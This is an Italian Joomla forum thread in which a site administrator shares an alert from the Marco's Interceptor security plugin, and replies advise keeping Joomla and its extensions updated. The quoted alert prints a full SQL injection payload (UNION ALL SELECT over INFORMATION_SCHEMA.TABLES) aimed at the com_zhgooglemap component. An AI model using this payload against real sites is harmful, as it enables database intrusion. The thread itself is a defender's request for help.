Joomla.it Forum

Non solo Joomla... => Sicurezza => Topic aperto da: Funghetto - 09 Mar 2019, 10:16:16

Titolo: continui attacchi rilevati da plugin Marco's Interceptor
Inserito da: Funghetto - 09 Mar 2019, 10:16:16
Ciao, sto avendo continui tentativi di attacchi su vari siti che gestisco, anche su quelli dove costantemente aggiorno versione di joomla e componenti vari.

Questi attacchi mi vengono rilevati dal plugin Marco's Interceptor che in automatico mi avvisa con messaggi di questo tipo, cosa posso fare?

Citazione
** PATTERNS MATCHED (possible hack attempts) * Union Select $_POST['id'] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- * Union Select $_REQUEST['id'] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,-- ** PAGE / SERVER INFO *REMOTE_ADDR : 14.xxx.xxx.xxx *HTTP_USER_AGENT : Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) *REQUEST_METHOD : POST *QUERY_STRING : ** SUPERGLOBALS DUMP (sanitized) *$_GET DUMP: Array ( ) *$_POST DUMP: Array ( [option] => com_zhgooglemap [no_html] => 1 [format] => raw [task] => getPlacemarkDetails [id] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- ) *$_COOKIE DUMP: Array ( ) *$_REQUEST DUMP: Array ( [option] => com_zhgooglemap [no_html] => 1 [format] => raw [task] => getPlacemarkDetails [id] => -11 UNION ALL SELECT 11,11,11,11,11,11,11,11, CONCAT(( SELECT group_concat(TABLE_NAME) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%zhgooglemaps_markergroups' AND TABLE_SCHEMA = DATABASE() )), 11,11,11,11,-- )
Titolo: Re:continui attacchi rilevati da plugin Marco's Interceptor
Inserito da: danielecr - 09 Mar 2019, 10:50:31
Nulla, a meno che tu non voglia andare a casa di chi/cosa compie l'attacco e staccargli la corrente e la fibra.
Titolo: Re:continui attacchi rilevati da plugin Marco's Interceptor
Inserito da: jeckodevelopment - 21 Mar 2019, 15:08:32
assicurarti di avere SEMPRE l'ultima versione di Joomla e delle estensioni (componenti, moduli, plugin e template)